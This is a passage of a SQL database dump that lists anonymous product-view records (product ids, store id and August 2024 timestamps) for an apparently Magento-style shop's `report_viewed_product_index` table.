(12361, NULL, NULL, 2063, 1, '2024-08-02 14:51:09'),
(12362, NULL, NULL, 2062, 1, '2024-08-02 14:51:12'),
(12363, NULL, NULL, 2061, 1, '2024-08-02 14:51:16'),
(12364, NULL, NULL, 2060, 1, '2024-08-02 14:51:19'),
(12365, NULL, NULL, 2059, 1, '2024-08-02 14:51:21'),
(12366, NULL, NULL, 2058, 1, '2024-08-02 14:51:24'),
(12367, NULL, NULL, 2055, 1, '2024-08-02 14:51:27'),
(12368, NULL, NULL, 2054, 1, '2024-08-02 14:51:30'),
(12369, NULL, NULL, 2064, 1, '2024-08-02 14:51:34'),
(12370, NULL, NULL, 2058, 1, '2024-08-02 14:51:38'),
(12371, NULL, NULL, 2059, 1, '2024-08-02 14:51:42'),
(12372, NULL, NULL, 2060, 1, '2024-08-02 14:51:44'),
(12373, NULL, NULL, 2061, 1, '2024-08-02 14:51:48'),
(12374, NULL, NULL, 2062, 1, '2024-08-02 14:51:51'),
(12375, NULL, NULL, 2063, 1, '2024-08-02 14:51:53'),
(12376, NULL, NULL, 2064, 1, '2024-08-02 14:52:01'),
(12377, NULL, NULL, 2063, 1, '2024-08-02 14:52:04'),
(12378, NULL, NULL, 2062, 1, '2024-08-02 14:52:07'),
(12379, NULL, NULL, 2061, 1, '2024-08-02 14:52:09'),
(12380, NULL, NULL, 2060, 1, '2024-08-02 14:52:14'),
(12381, NULL, NULL, 2059, 1, '2024-08-02 14:52:17'),
(12382, NULL, NULL, 2058, 1, '2024-08-02 14:52:20'),
(12383, NULL, NULL, 2055, 1, '2024-08-02 14:52:24'),
(12384, NULL, NULL, 2054, 1, '2024-08-02 14:52:27'),
(12385, NULL, NULL, 2064, 1, '2024-08-02 14:52:30'),
(12386, NULL, NULL, 2058, 1, '2024-08-02 14:52:33'),
(12387, NULL, NULL, 2059, 1, '2024-08-02 14:52:36'),
(12388, NULL, NULL, 2060, 1, '2024-08-02 14:52:39'),
(12389, NULL, NULL, 2061, 1, '2024-08-02 14:52:42'),
(12390, NULL, NULL, 2062, 1, '2024-08-02 14:52:44'),
(12391, NULL, NULL, 2063, 1, '2024-08-02 14:52:48'),
(12392, NULL, NULL, 2058, 1, '2024-08-03 09:18:56'),
(12393, NULL, NULL, 2059, 1, '2024-08-03 09:20:54'),
(12394, NULL, NULL, 2058, 1, '2024-08-03 09:21:17'),
(12395, NULL, NULL, 2063, 1, '2024-08-03 09:21:28'),
(12396, NULL, NULL, 2062, 1, '2024-08-03 09:21:40'),
(12397, NULL, NULL, 2054, 1, '2024-08-03 09:21:53'),
(12398, NULL, NULL, 2064, 1, '2024-08-03 09:22:05'),
(12399, NULL, NULL, 2064, 1, '2024-08-03 09:23:14'),
(12400, NULL, NULL, 2061, 1, '2024-08-03 09:23:32'),
(12401, NULL, NULL, 2058, 1, '2024-08-03 09:23:44'),
(12402, NULL, NULL, 2055, 1, '2024-08-03 09:23:56'),
(12403, NULL, NULL, 2060, 1, '2024-08-03 09:24:13'),
(12404, NULL, NULL, 2055, 1, '2024-08-03 09:24:24'),
(12405, NULL, NULL, 2064, 1, '2024-08-03 09:24:53'),
(12406, NULL, NULL, 2063, 1, '2024-08-03 09:25:08'),
(12407, NULL, NULL, 2062, 1, '2024-08-03 09:25:20'),
(12408, NULL, NULL, 2061, 1, '2024-08-03 09:25:32'),
(12409, NULL, NULL, 2060, 1, '2024-08-03 09:25:44'),
(12410, NULL, NULL, 2059, 1, '2024-08-03 09:25:56'),
(12411, NULL, NULL, 2058, 1, '2024-08-03 09:26:08'),
(12412, NULL, NULL, 2055, 1, '2024-08-03 09:26:19'),
(12413, NULL, NULL, 2054, 1, '2024-08-03 09:26:31'),
(12414, NULL, NULL, 2053, 1, '2024-08-03 09:26:43'),
(12415, NULL, NULL, 2061, 1, '2024-08-03 09:26:56'),
(12416, NULL, NULL, 2064, 1, '2024-08-03 09:27:56'),
(12417, NULL, NULL, 2063, 1, '2024-08-03 09:28:11'),
(12418, NULL, NULL, 2062, 1, '2024-08-03 09:28:24'),
(12419, NULL, NULL, 2061, 1, '2024-08-03 09:28:36'),
(12420, NULL, NULL, 2060, 1, '2024-08-03 09:28:48'),
(12421, NULL, NULL, 2059, 1, '2024-08-03 09:29:01'),
(12422, NULL, NULL, 2058, 1, '2024-08-03 09:29:12'),
(12423, NULL, NULL, 2055, 1, '2024-08-03 09:29:24'),
(12424, NULL, NULL, 2054, 1, '2024-08-03 09:29:36'),
(12425, NULL, NULL, 2064, 1, '2024-08-03 09:30:09'),
(12426, NULL, NULL, 2063, 1, '2024-08-03 09:30:23'),
(12427, NULL, NULL, 2062, 1, '2024-08-03 09:30:35'),
(12428, NULL, NULL, 2061, 1, '2024-08-03 09:30:47'),
(12429, NULL, NULL, 2060, 1, '2024-08-03 09:30:59'),
(12430, NULL, NULL, 2059, 1, '2024-08-03 09:31:11'),
(12431, NULL, NULL, 2058, 1, '2024-08-03 09:31:23'),
(12432, NULL, NULL, 2055, 1, '2024-08-03 09:31:35'),
(12433, NULL, NULL, 2054, 1, '2024-08-03 09:31:47'),
(12434, NULL, NULL, 2064, 1, '2024-08-03 09:31:59'),
(12435, NULL, NULL, 2058, 1, '2024-08-03 09:32:14'),
(12436, NULL, NULL, 2059, 1, '2024-08-03 09:32:26'),
(12437, NULL, NULL, 2060, 1, '2024-08-03 09:32:39'),
(12438, NULL, NULL, 2061, 1, '2024-08-03 09:32:51'),
(12439, NULL, NULL, 2062, 1, '2024-08-03 09:33:03'),
(12440, NULL, NULL, 2063, 1, '2024-08-03 09:33:15'),
(12441, NULL, NULL, 2064, 1, '2024-08-03 09:33:37'),
(12442, NULL, NULL, 2058, 1, '2024-08-03 09:33:52'),
(12443, NULL, NULL, 2059, 1, '2024-08-03 09:34:04'),
(12444, NULL, NULL, 2060, 1, '2024-08-03 09:34:17'),
(12445, NULL, NULL, 2061, 1, '2024-08-03 09:34:29'),
(12446, NULL, NULL, 2062, 1, '2024-08-03 09:34:42'),
(12447, NULL, NULL, 2063, 1, '2024-08-03 09:34:55'),
(12448, NULL, NULL, 2064, 1, '2024-08-03 09:35:55'),
(12449, NULL, NULL, 2063, 1, '2024-08-03 09:36:11'),
(12450, NULL, NULL, 2062, 1, '2024-08-03 09:36:23'),
(12451, NULL, NULL, 2061, 1, '2024-08-03 09:36:36'),
(12452, NULL, NULL, 2060, 1, '2024-08-03 09:36:49'),
(12453, NULL, NULL, 2059, 1, '2024-08-03 09:37:01'),
(12454, NULL, NULL, 2058, 1, '2024-08-03 09:37:14'),
(12455, NULL, NULL, 2055, 1, '2024-08-03 09:37:27'),
(12456, NULL, NULL, 2054, 1, '2024-08-03 09:37:40'),
(12457, NULL, NULL, 2064, 1, '2024-08-03 09:38:57'),
(12458, NULL, NULL, 2063, 1, '2024-08-03 09:39:16'),
(12459, NULL, NULL, 2062, 1, '2024-08-03 09:39:28'),
(12460, NULL, NULL, 2061, 1, '2024-08-03 09:39:42'),
(12461, NULL, NULL, 2060, 1, '2024-08-03 09:39:55'),
(12462, NULL, NULL, 2059, 1, '2024-08-03 09:40:08'),
(12463, NULL, NULL, 2058, 1, '2024-08-03 09:40:21'),
(12464, NULL, NULL, 2055, 1, '2024-08-03 09:40:34'),
(12465, NULL, NULL, 2054, 1, '2024-08-03 09:40:47'),
(12466, NULL, NULL, 2064, 1, '2024-08-03 09:42:07'),
(12467, NULL, NULL, 2063, 1, '2024-08-03 09:42:22'),
(12468, NULL, NULL, 2062, 1, '2024-08-03 09:42:35'),
(12469, NULL, NULL, 2061, 1, '2024-08-03 09:42:48'),
(12470, NULL, NULL, 2060, 1, '2024-08-03 09:43:01'),
(12471, NULL, NULL, 2059, 1, '2024-08-03 09:43:13'),
(12472, NULL, NULL, 2058, 1, '2024-08-03 09:43:25'),
(12473, NULL, NULL, 2055, 1, '2024-08-03 09:43:38'),
(12474, NULL, NULL, 2054, 1, '2024-08-03 09:43:50'),
(12475, NULL, NULL, 2059, 1, '2024-08-03 17:45:05'),
(12476, NULL, NULL, 2061, 1, '2024-08-03 18:10:14'),
(12477, NULL, NULL, 2064, 1, '2024-08-03 19:12:21'),
(12478, NULL, NULL, 2054, 1, '2024-08-03 19:13:56'),
(12479, NULL, NULL, 2060, 1, '2024-08-03 21:57:26'),
(12480, NULL, NULL, 2060, 1, '2024-08-04 00:18:55'),
(12481, NULL, NULL, 2062, 1, '2024-08-04 00:19:01'),
(12482, NULL, NULL, 2064, 1, '2024-08-04 00:19:13'),
(12483, NULL, NULL, 2063, 1, '2024-08-04 00:19:21'),
(12484, NULL, NULL, 2062, 1, '2024-08-04 00:19:27'),
(12485, NULL, NULL, 2061, 1, '2024-08-04 00:19:33'),
(12486, NULL, NULL, 2060, 1, '2024-08-04 00:19:39'),
(12487, NULL, NULL, 2059, 1, '2024-08-04 00:19:44'),
(12488, NULL, NULL, 2058, 1, '2024-08-04 00:19:50'),
(12489, NULL, NULL, 2064, 1, '2024-08-04 00:20:03'),
(12490, NULL, NULL, 2063, 1, '2024-08-04 00:20:09'),
(12491, NULL, NULL, 2062, 1, '2024-08-04 00:20:14'),
(12492, NULL, NULL, 2061, 1, '2024-08-04 00:20:19'),
(12493, NULL, NULL, 2060, 1, '2024-08-04 00:20:24'),
(12494, NULL, NULL, 2064, 1, '2024-08-04 00:20:33'),
(12495, NULL, NULL, 2058, 1, '2024-08-04 00:20:39'),
(12496, NULL, NULL, 2059, 1, '2024-08-04 00:20:45'),
(12497, NULL, NULL, 2060, 1, '2024-08-04 00:20:50'),
(12498, NULL, NULL, 2061, 1, '2024-08-04 00:20:55'),
(12499, NULL, NULL, 2062, 1, '2024-08-04 00:21:00'),
(12500, NULL, NULL, 2063, 1, '2024-08-04 00:21:05'),
(12501, NULL, NULL, 2059, 1, '2024-08-04 00:21:14'),
(12502, NULL, NULL, 2061, 1, '2024-08-04 00:21:23'),
(12503, NULL, NULL, 2064, 1, '2024-08-04 00:21:33'),
(12504, NULL, NULL, 2061, 1, '2024-08-04 00:21:40'),
(12505, NULL, NULL, 2058, 1, '2024-08-04 00:21:45'),
(12506, NULL, NULL, 2055, 1, '2024-08-04 00:21:50'),
(12507, NULL, NULL, 2063, 1, '2024-08-04 00:21:55'),
(12508, NULL, NULL, 2054, 1, '2024-08-04 00:22:00'),
(12509, NULL, NULL, 2058, 1, '2024-08-04 00:22:10'),
(12510, NULL, NULL, 2055, 1, '2024-08-04 00:22:15'),
(12511, NULL, NULL, 2064, 1, '2024-08-04 00:22:36'),
(12512, NULL, NULL, 2063, 1, '2024-08-04 00:22:43'),
(12513, NULL, NULL, 2062, 1, '2024-08-04 00:22:48'),
(12514, NULL, NULL, 2061, 1, '2024-08-04 00:22:54'),
(12515, NULL, NULL, 2060, 1, '2024-08-04 00:22:59'),
(12516, NULL, NULL, 2059, 1, '2024-08-04 00:23:04'),
(12517, NULL, NULL, 2058, 1, '2024-08-04 00:23:10'),
(12518, NULL, NULL, 2055, 1, '2024-08-04 00:23:16'),
(12519, NULL, NULL, 2054, 1, '2024-08-04 00:23:21'),
(12520, NULL, NULL, 2064, 1, '2024-08-04 00:23:29'),
(12521, NULL, NULL, 2058, 1, '2024-08-04 00:23:37'),
(12522, NULL, NULL, 2059, 1, '2024-08-04 00:23:42'),
(12523, NULL, NULL, 2060, 1, '2024-08-04 00:23:47'),
(12524, NULL, NULL, 2061, 1, '2024-08-04 00:23:52'),
(12525, NULL, NULL, 2062, 1, '2024-08-04 00:23:57'),
(12526, NULL, NULL, 2063, 1, '2024-08-04 00:24:02'),
(12527, NULL, NULL, 2064, 1, '2024-08-04 00:24:24'),
(12528, NULL, NULL, 2058, 1, '2024-08-04 00:24:31'),
(12529, NULL, NULL, 2059, 1, '2024-08-04 00:24:36'),
(12530, NULL, NULL, 2060, 1, '2024-08-04 00:24:42'),
(12531, NULL, NULL, 2061, 1, '2024-08-04 00:24:48'),
(12532, NULL, NULL, 2062, 1, '2024-08-04 00:24:53'),
(12533, NULL, NULL, 2063, 1, '2024-08-04 00:24:59'),
(12534, NULL, NULL, 2064, 1, '2024-08-04 00:25:12'),
(12535, NULL, NULL, 2063, 1, '2024-08-04 00:25:19'),
(12536, NULL, NULL, 2062, 1, '2024-08-04 00:25:24'),
(12537, NULL, NULL, 2061, 1, '2024-08-04 00:25:30'),
(12538, NULL, NULL, 2060, 1, '2024-08-04 00:25:35'),
(12539, NULL, NULL, 2059, 1, '2024-08-04 00:25:40'),
(12540, NULL, NULL, 2058, 1, '2024-08-04 00:25:46'),
(12541, NULL, NULL, 2055, 1, '2024-08-04 00:25:52'),
(12542, NULL, NULL, 2054, 1, '2024-08-04 00:25:58'),
(12543, NULL, NULL, 2062, 1, '2024-08-04 04:24:04'),
(12544, NULL, NULL, 2064, 1, '2024-08-04 04:24:07'),
(12545, NULL, NULL, 2059, 1, '2024-08-04 04:24:10'),
(12546, NULL, NULL, 2058, 1, '2024-08-04 04:24:19'),
(12547, NULL, NULL, 2061, 1, '2024-08-04 04:24:22'),
(12548, NULL, NULL, 2054, 1, '2024-08-04 04:24:28'),
(12549, NULL, NULL, 2060, 1, '2024-08-04 04:24:34'),
(12550, NULL, NULL, 2063, 1, '2024-08-04 04:24:38'),
(12551, NULL, NULL, 2064, 1, '2024-08-04 04:24:42'),
(12552, NULL, NULL, 2064, 1, '2024-08-04 04:24:50'),
(12553, NULL, NULL, 2055, 1, '2024-08-04 04:24:52'),
(12554, NULL, NULL, 2054, 1, '2024-08-04 04:32:51'),
(12555, NULL, NULL, 2060, 1, '2024-08-04 05:00:58'),
(12556, NULL, NULL, 2061, 1, '2024-08-04 05:31:25'),
(12557, NULL, NULL, 2059, 1, '2024-08-04 06:20:11'),
(12558, NULL, NULL, 2058, 1, '2024-08-04 06:35:13'),
(12559, NULL, NULL, 2064, 1, '2024-08-04 06:55:15'),
(12560, NULL, NULL, 2062, 1, '2024-08-04 07:28:33'),
(12561, NULL, NULL, 2055, 1, '2024-08-04 08:19:53'),
(12562, NULL, NULL, 2064, 1, '2024-08-04 08:39:34'),
(12563, NULL, NULL, 2054, 1, '2024-08-04 08:44:33'),
(12564, NULL, NULL, 2063, 1, '2024-08-04 09:02:23'),
(12565, NULL, NULL, 2058, 1, '2024-08-04 09:14:21'),
(12566, NULL, NULL, 2062, 1, '2024-08-04 12:19:07'),
(12567, NULL, NULL, 2058, 1, '2024-08-04 19:16:41'),
(12568, NULL, NULL, 2062, 1, '2024-08-05 00:10:49'),
(12569, NULL, NULL, 2061, 1, '2024-08-05 06:11:16'),
(12570, NULL, NULL, 2054, 1, '2024-08-05 12:28:13'),
(12571, NULL, NULL, 2058, 1, '2024-08-05 17:02:08'),
(12572, NULL, NULL, 2061, 1, '2024-08-05 17:02:34'),
(12573, NULL, NULL, 2059, 1, '2024-08-05 17:02:42'),
(12574, NULL, NULL, 2058, 1, '2024-08-05 17:02:50'),
(12575, NULL, NULL, 2054, 1, '2024-08-05 17:02:58'),
(12576, NULL, NULL, 2062, 1, '2024-08-05 17:03:05'),
(12577, NULL, NULL, 2064, 1, '2024-08-05 17:03:25'),
(12578, NULL, NULL, 2063, 1, '2024-08-05 17:03:35');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(12579, NULL, NULL, 2062, 1, '2024-08-05 17:03:42'),
(12580, NULL, NULL, 2061, 1, '2024-08-05 17:03:52'),
(12581, NULL, NULL, 2060, 1, '2024-08-05 17:03:59'),
(12582, NULL, NULL, 2059, 1, '2024-08-05 17:04:07'),
(12583, NULL, NULL, 2058, 1, '2024-08-05 17:04:14'),
(12584, NULL, NULL, 2055, 1, '2024-08-05 17:04:22'),
(12585, NULL, NULL, 2054, 1, '2024-08-05 17:04:31'),
(12586, NULL, NULL, 2053, 1, '2024-08-05 17:04:38'),
(12587, NULL, NULL, 2059, 1, '2024-08-05 17:04:46'),
(12588, NULL, NULL, 2055, 1, '2024-08-05 17:04:53'),
(12589, NULL, NULL, 2064, 1, '2024-08-05 17:05:16'),
(12590, NULL, NULL, 2061, 1, '2024-08-05 17:05:25'),
(12591, NULL, NULL, 2058, 1, '2024-08-05 17:05:35'),
(12592, NULL, NULL, 2055, 1, '2024-08-05 17:05:43'),
(12593, NULL, NULL, 2064, 1, '2024-08-05 17:05:57'),
(12594, NULL, NULL, 2058, 1, '2024-08-05 17:06:08'),
(12595, NULL, NULL, 2059, 1, '2024-08-05 17:06:15'),
(12596, NULL, NULL, 2060, 1, '2024-08-05 17:06:24'),
(12597, NULL, NULL, 2061, 1, '2024-08-05 17:06:32'),
(12598, NULL, NULL, 2062, 1, '2024-08-05 17:06:39'),
(12599, NULL, NULL, 2063, 1, '2024-08-05 17:06:46'),
(12600, NULL, NULL, 2054, 1, '2024-08-05 17:06:53'),
(12601, NULL, NULL, 2060, 1, '2024-08-05 17:06:59'),
(12602, NULL, NULL, 2061, 1, '2024-08-05 17:07:06'),
(12603, NULL, NULL, 2063, 1, '2024-08-05 17:07:13'),
(12604, NULL, NULL, 2064, 1, '2024-08-05 17:08:47'),
(12605, NULL, NULL, 2063, 1, '2024-08-05 17:08:48'),
(12606, NULL, NULL, 2062, 1, '2024-08-05 17:08:55'),
(12607, NULL, NULL, 2061, 1, '2024-08-05 17:09:01'),
(12608, NULL, NULL, 2060, 1, '2024-08-05 17:09:08'),
(12609, NULL, NULL, 2059, 1, '2024-08-05 17:09:15'),
(12610, NULL, NULL, 2058, 1, '2024-08-05 17:09:22'),
(12611, NULL, NULL, 2055, 1, '2024-08-05 17:09:29'),
(12612, NULL, NULL, 2054, 1, '2024-08-05 17:09:36'),
(12613, NULL, NULL, 2054, 1, '2024-08-05 17:25:49'),
(12614, NULL, NULL, 2064, 1, '2024-08-05 17:40:15'),
(12615, NULL, NULL, 2058, 1, '2024-08-05 17:40:23'),
(12616, NULL, NULL, 2059, 1, '2024-08-05 17:40:29'),
(12617, NULL, NULL, 2060, 1, '2024-08-05 17:40:36'),
(12618, NULL, NULL, 2061, 1, '2024-08-05 17:40:43'),
(12619, NULL, NULL, 2062, 1, '2024-08-05 17:40:50'),
(12620, NULL, NULL, 2063, 1, '2024-08-05 17:40:56'),
(12621, NULL, NULL, 2064, 1, '2024-08-05 17:41:20'),
(12622, NULL, NULL, 2058, 1, '2024-08-05 17:41:27'),
(12623, NULL, NULL, 2059, 1, '2024-08-05 17:41:34'),
(12624, NULL, NULL, 2060, 1, '2024-08-05 17:41:41'),
(12625, NULL, NULL, 2061, 1, '2024-08-05 17:41:47'),
(12626, NULL, NULL, 2062, 1, '2024-08-05 17:41:54'),
(12627, NULL, NULL, 2063, 1, '2024-08-05 17:42:00'),
(12628, NULL, NULL, 2059, 1, '2024-08-05 19:31:46'),
(12629, NULL, NULL, 2054, 1, '2024-08-05 21:43:18'),
(12630, NULL, NULL, 2063, 1, '2024-08-06 02:45:33'),
(12631, NULL, NULL, 2060, 1, '2024-08-06 03:08:50'),
(12632, NULL, NULL, 2055, 1, '2024-08-06 04:00:42'),
(12633, NULL, NULL, 2055, 1, '2024-08-06 05:40:39'),
(12634, NULL, NULL, 2054, 1, '2024-08-06 09:56:58'),
(12635, NULL, NULL, 2062, 1, '2024-08-06 11:16:45'),
(12636, NULL, NULL, 2063, 1, '2024-08-06 11:38:13'),
(12637, NULL, NULL, 2062, 1, '2024-08-06 13:39:41'),
(12638, NULL, NULL, 2064, 1, '2024-08-06 13:39:59'),
(12639, NULL, NULL, 2063, 1, '2024-08-06 13:40:09'),
(12640, NULL, NULL, 2062, 1, '2024-08-06 13:40:17'),
(12641, NULL, NULL, 2061, 1, '2024-08-06 13:40:25'),
(12642, NULL, NULL, 2054, 1, '2024-08-06 13:40:32'),
(12643, NULL, NULL, 2058, 1, '2024-08-06 13:40:39'),
(12644, NULL, NULL, 2064, 1, '2024-08-06 13:40:57'),
(12645, NULL, NULL, 2061, 1, '2024-08-06 13:41:10'),
(12646, NULL, NULL, 2058, 1, '2024-08-06 13:41:19'),
(12647, NULL, NULL, 2055, 1, '2024-08-06 13:41:28'),
(12648, NULL, NULL, 2064, 1, '2024-08-06 13:41:44'),
(12649, NULL, NULL, 2063, 1, '2024-08-06 13:41:53'),
(12650, NULL, NULL, 2062, 1, '2024-08-06 13:42:00'),
(12651, NULL, NULL, 2061, 1, '2024-08-06 13:42:07'),
(12652, NULL, NULL, 2060, 1, '2024-08-06 13:42:14'),
(12653, NULL, NULL, 2061, 1, '2024-08-06 13:42:30'),
(12654, NULL, NULL, 2059, 1, '2024-08-06 13:42:39'),
(12655, NULL, NULL, 2058, 1, '2024-08-06 13:42:48'),
(12656, NULL, NULL, 2054, 1, '2024-08-06 13:42:54'),
(12657, NULL, NULL, 2055, 1, '2024-08-06 13:43:05'),
(12658, NULL, NULL, 2063, 1, '2024-08-06 13:43:11'),
(12659, NULL, NULL, 2064, 1, '2024-08-06 13:43:17'),
(12660, NULL, NULL, 2058, 1, '2024-08-06 13:43:25'),
(12661, NULL, NULL, 2059, 1, '2024-08-06 13:43:30'),
(12662, NULL, NULL, 2060, 1, '2024-08-06 13:43:37'),
(12663, NULL, NULL, 2061, 1, '2024-08-06 13:43:43'),
(12664, NULL, NULL, 2062, 1, '2024-08-06 13:43:49'),
(12665, NULL, NULL, 2063, 1, '2024-08-06 13:43:56'),
(12666, NULL, NULL, 2061, 1, '2024-08-06 13:44:03'),
(12667, NULL, NULL, 2059, 1, '2024-08-06 13:44:09'),
(12668, NULL, NULL, 2060, 1, '2024-08-06 13:44:15'),
(12669, NULL, NULL, 2064, 1, '2024-08-06 13:44:52'),
(12670, NULL, NULL, 2063, 1, '2024-08-06 13:45:00'),
(12671, NULL, NULL, 2062, 1, '2024-08-06 13:45:06'),
(12672, NULL, NULL, 2061, 1, '2024-08-06 13:45:12'),
(12673, NULL, NULL, 2060, 1, '2024-08-06 13:45:18'),
(12674, NULL, NULL, 2059, 1, '2024-08-06 13:45:24'),
(12675, NULL, NULL, 2058, 1, '2024-08-06 13:45:30'),
(12676, NULL, NULL, 2055, 1, '2024-08-06 13:45:36'),
(12677, NULL, NULL, 2054, 1, '2024-08-06 13:45:43'),
(12678, NULL, NULL, 2064, 1, '2024-08-06 13:45:55'),
(12679, NULL, NULL, 2058, 1, '2024-08-06 13:46:03'),
(12680, NULL, NULL, 2059, 1, '2024-08-06 13:46:10'),
(12681, NULL, NULL, 2060, 1, '2024-08-06 13:46:16'),
(12682, NULL, NULL, 2061, 1, '2024-08-06 13:46:23'),
(12683, NULL, NULL, 2062, 1, '2024-08-06 13:46:29'),
(12684, NULL, NULL, 2063, 1, '2024-08-06 13:46:36'),
(12685, NULL, NULL, 2064, 1, '2024-08-06 13:47:05'),
(12686, NULL, NULL, 2063, 1, '2024-08-06 13:47:14'),
(12687, NULL, NULL, 2062, 1, '2024-08-06 13:47:20'),
(12688, NULL, NULL, 2061, 1, '2024-08-06 13:47:26'),
(12689, NULL, NULL, 2060, 1, '2024-08-06 13:47:33'),
(12690, NULL, NULL, 2059, 1, '2024-08-06 13:47:39'),
(12691, NULL, NULL, 2058, 1, '2024-08-06 13:47:45'),
(12692, NULL, NULL, 2055, 1, '2024-08-06 13:47:52'),
(12693, NULL, NULL, 2054, 1, '2024-08-06 13:47:58'),
(12694, NULL, NULL, 2064, 1, '2024-08-06 13:48:04'),
(12695, NULL, NULL, 2058, 1, '2024-08-06 13:48:11'),
(12696, NULL, NULL, 2059, 1, '2024-08-06 13:48:17'),
(12697, NULL, NULL, 2060, 1, '2024-08-06 13:48:23'),
(12698, NULL, NULL, 2061, 1, '2024-08-06 13:48:29'),
(12699, NULL, NULL, 2062, 1, '2024-08-06 13:48:35'),
(12700, NULL, NULL, 2063, 1, '2024-08-06 13:48:41'),
(12701, NULL, NULL, 2054, 1, '2024-08-06 17:34:24'),
(12702, NULL, NULL, 2054, 1, '2024-08-06 20:49:24'),
(12703, NULL, NULL, 2064, 1, '2024-08-07 08:00:31'),
(12704, NULL, NULL, 2061, 1, '2024-08-07 12:30:04'),
(12705, NULL, NULL, 2054, 1, '2024-08-07 16:00:28'),
(12706, NULL, NULL, 2054, 1, '2024-08-07 19:02:54'),
(12707, NULL, NULL, 2058, 1, '2024-08-07 19:38:32'),
(12708, NULL, NULL, 2055, 1, '2024-08-08 02:39:57'),
(12709, NULL, NULL, 2064, 1, '2024-08-08 02:40:11'),
(12710, NULL, NULL, 2063, 1, '2024-08-08 02:40:17'),
(12711, NULL, NULL, 2062, 1, '2024-08-08 02:40:20'),
(12712, NULL, NULL, 2060, 1, '2024-08-08 02:40:25'),
(12713, NULL, NULL, 2055, 1, '2024-08-08 05:21:01'),
(12714, NULL, NULL, 2054, 1, '2024-08-08 10:57:46'),
(12715, NULL, NULL, 2058, 1, '2024-08-08 13:21:14'),
(12716, NULL, NULL, 2064, 1, '2024-08-08 14:46:49'),
(12717, NULL, NULL, 2064, 1, '2024-08-08 17:00:38'),
(12718, NULL, NULL, 2055, 1, '2024-08-08 18:19:18'),
(12719, NULL, NULL, 2064, 1, '2024-08-08 18:39:10'),
(12720, NULL, NULL, 2058, 1, '2024-08-08 23:05:18'),
(12721, NULL, NULL, 2054, 1, '2024-08-09 00:17:23'),
(12722, NULL, NULL, 2054, 1, '2024-08-09 00:34:41'),
(12723, NULL, NULL, 2062, 1, '2024-08-09 02:14:36'),
(12724, NULL, NULL, 2059, 1, '2024-08-09 04:48:12'),
(12725, NULL, NULL, 2058, 1, '2024-08-09 07:09:47'),
(12726, NULL, NULL, 2061, 1, '2024-08-09 08:29:48'),
(12727, NULL, NULL, 2061, 1, '2024-08-09 09:29:46'),
(12728, NULL, NULL, 2059, 1, '2024-08-09 09:29:49'),
(12729, NULL, NULL, 2064, 1, '2024-08-09 09:29:54'),
(12730, NULL, NULL, 2061, 1, '2024-08-09 09:29:57'),
(12731, NULL, NULL, 2058, 1, '2024-08-09 09:30:00'),
(12732, NULL, NULL, 2055, 1, '2024-08-09 09:30:02'),
(12733, NULL, NULL, 2061, 1, '2024-08-09 09:30:07'),
(12734, NULL, NULL, 2059, 1, '2024-08-09 09:30:10'),
(12735, NULL, NULL, 2058, 1, '2024-08-09 09:30:12'),
(12736, NULL, NULL, 2054, 1, '2024-08-09 09:30:15'),
(12737, NULL, NULL, 2064, 1, '2024-08-09 09:30:17'),
(12738, NULL, NULL, 2058, 1, '2024-08-09 09:30:20'),
(12739, NULL, NULL, 2059, 1, '2024-08-09 09:30:23'),
(12740, NULL, NULL, 2060, 1, '2024-08-09 09:30:25'),
(12741, NULL, NULL, 2061, 1, '2024-08-09 09:30:28'),
(12742, NULL, NULL, 2062, 1, '2024-08-09 09:30:30'),
(12743, NULL, NULL, 2063, 1, '2024-08-09 09:30:32'),
(12744, NULL, NULL, 2063, 1, '2024-08-09 09:30:37'),
(12745, NULL, NULL, 2058, 1, '2024-08-09 09:30:43'),
(12746, NULL, NULL, 2054, 1, '2024-08-09 09:30:46'),
(12747, NULL, NULL, 2062, 1, '2024-08-09 09:30:48'),
(12748, NULL, NULL, 2064, 1, '2024-08-09 09:30:55'),
(12749, NULL, NULL, 2063, 1, '2024-08-09 09:30:58'),
(12750, NULL, NULL, 2062, 1, '2024-08-09 09:31:01'),
(12751, NULL, NULL, 2061, 1, '2024-08-09 09:31:03'),
(12752, NULL, NULL, 2060, 1, '2024-08-09 09:31:05'),
(12753, NULL, NULL, 2059, 1, '2024-08-09 09:31:08'),
(12754, NULL, NULL, 2058, 1, '2024-08-09 09:31:10'),
(12755, NULL, NULL, 2055, 1, '2024-08-09 09:31:12'),
(12756, NULL, NULL, 2054, 1, '2024-08-09 09:31:14'),
(12757, NULL, NULL, 2053, 1, '2024-08-09 09:31:17'),
(12758, NULL, NULL, 2055, 1, '2024-08-09 09:31:19'),
(12759, NULL, NULL, 2060, 1, '2024-08-09 09:31:21'),
(12760, NULL, NULL, 2064, 1, '2024-08-09 09:31:26'),
(12761, NULL, NULL, 2063, 1, '2024-08-09 09:31:29'),
(12762, NULL, NULL, 2062, 1, '2024-08-09 09:31:31'),
(12763, NULL, NULL, 2061, 1, '2024-08-09 09:31:33'),
(12764, NULL, NULL, 2060, 1, '2024-08-09 09:31:35'),
(12765, NULL, NULL, 2059, 1, '2024-08-09 09:31:37'),
(12766, NULL, NULL, 2058, 1, '2024-08-09 09:31:39'),
(12767, NULL, NULL, 2055, 1, '2024-08-09 09:31:42'),
(12768, NULL, NULL, 2054, 1, '2024-08-09 09:31:44'),
(12769, NULL, NULL, 2064, 1, '2024-08-09 09:31:48'),
(12770, NULL, NULL, 2058, 1, '2024-08-09 09:31:50'),
(12771, NULL, NULL, 2059, 1, '2024-08-09 09:31:53'),
(12772, NULL, NULL, 2060, 1, '2024-08-09 09:31:55'),
(12773, NULL, NULL, 2061, 1, '2024-08-09 09:31:57'),
(12774, NULL, NULL, 2062, 1, '2024-08-09 09:31:59'),
(12775, NULL, NULL, 2063, 1, '2024-08-09 09:32:01'),
(12776, NULL, NULL, 2064, 1, '2024-08-09 09:32:05'),
(12777, NULL, NULL, 2063, 1, '2024-08-09 09:32:08'),
(12778, NULL, NULL, 2062, 1, '2024-08-09 09:32:10'),
(12779, NULL, NULL, 2061, 1, '2024-08-09 09:32:12'),
(12780, NULL, NULL, 2060, 1, '2024-08-09 09:32:14'),
(12781, NULL, NULL, 2059, 1, '2024-08-09 09:32:17'),
(12782, NULL, NULL, 2058, 1, '2024-08-09 09:32:19'),
(12783, NULL, NULL, 2055, 1, '2024-08-09 09:32:21'),
(12784, NULL, NULL, 2054, 1, '2024-08-09 09:32:24'),
(12785, NULL, NULL, 2064, 1, '2024-08-09 09:32:36'),
(12786, NULL, NULL, 2058, 1, '2024-08-09 09:32:38'),
